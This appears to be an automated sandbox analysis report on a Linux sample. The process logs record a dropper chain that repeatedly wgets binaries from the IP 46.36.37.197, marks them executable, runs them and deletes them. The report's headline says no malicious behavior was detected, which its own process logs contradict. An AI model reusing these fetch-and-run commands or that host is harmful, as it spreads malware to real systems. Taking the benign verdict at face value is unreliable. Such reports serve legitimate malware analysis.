Analysis Overview
SHA256
f8de487503f1ed3080384b523d7abcde65ed4db6716e312ec4d9abfb66986af8
Threat Level: No (potentially) malicious behavior was detected
The file a8f8e353270c830f56e946941a4bff39_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-14 09:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 09:29
Reported
2024-06-14 09:32
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
1s
Max time network
128s
Command Line
Signatures
Processes
/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118
[/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118]
/usr/bin/wget
[wget http://46.36.37.197/weedntpd]
/bin/chmod
[chmod +x weedntpd]
/tmp/weedntpd
[./weedntpd]
/bin/rm
[rm -rf weedntpd]
/usr/bin/wget
[wget http://46.36.37.197/weedsshd]
/bin/chmod
[chmod +x weedsshd]
/tmp/weedsshd
[./weedsshd]
/bin/rm
[rm -rf weedsshd]
/usr/bin/wget
[wget http://46.36.37.197/weedopenssh]
/bin/chmod
[chmod +x weedopenssh]
/tmp/weedopenssh
[./weedopenssh]
/bin/rm
[rm -rf weedopenssh]
/usr/bin/wget
[wget http://46.36.37.197/weedbash]
/bin/chmod
[chmod +x weedbash]
/tmp/weedbash
[./weedbash]
/bin/rm
[rm -rf weedbash]
/usr/bin/wget
[wget http://46.36.37.197/weedtftp]
/bin/chmod
[chmod +x weedtftp]
/tmp/weedtftp
[./weedtftp]
/bin/rm
[rm -rf weedtftp]
/usr/bin/wget
[wget http://46.36.37.197/weedwget]
/bin/chmod
[chmod +x weedwget]
/tmp/weedwget
[./weedwget]
/bin/rm
[rm -rf weedwget]
/usr/bin/wget
[wget http://46.36.37.197/weedcron]
/bin/chmod
[chmod +x weedcron]
/tmp/weedcron
[./weedcron]
/bin/rm
[rm -rf weedcron]
/usr/bin/wget
[wget http://46.36.37.197/weedftp]
/bin/chmod
[chmod +x weedftp]
/tmp/weedftp
[./weedftp]
/bin/rm
[rm -rf weedftp]
/usr/bin/wget
[wget http://46.36.37.197/weedpftp]
/bin/chmod
[chmod +x weedpftp]
/tmp/weedpftp
[./weedpftp]
/bin/rm
[rm -rf weedpftp]
/usr/bin/wget
[wget http://46.36.37.197/weedsh]
/bin/chmod
[chmod +x weedsh]
/tmp/weedsh
[./weedsh]
/bin/rm
[rm -rf weedsh]
/usr/bin/wget
[wget http://46.36.37.197/weedshit]
/bin/chmod
[chmod +x weedshit]
/tmp/weedshit
[./weedshit]
/bin/rm
[rm -rf weedshit]
/usr/bin/wget
[wget http://46.36.37.197/weedapache2]
/bin/chmod
[chmod +x weedapache2]
/tmp/weedapache2
[./weedapache2]
/bin/rm
[rm -rf weedapache2]
/usr/bin/wget
[wget http://46.36.37.197/weedtelnetd]
/bin/chmod
[chmod +x weedtelnetd]
/tmp/weedtelnetd
[./weedtelnetd]
/bin/rm
[rm -rf weedtelnetd]
Network
| Country | Destination | Domain | Proto |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| GB | 195.181.164.19:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 09:29
Reported
2024-06-14 09:32
Platform
debian9-armhf-20240611-en
Max time network
6s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
| CZ | 46.36.37.197:80 | 46.36.37.197 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-14 09:29
Reported
2024-06-14 09:29
Platform
debian9-mipsbe-20240418-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-14 09:29
Reported
2024-06-14 09:29
Platform
debian9-mipsel-20240611-en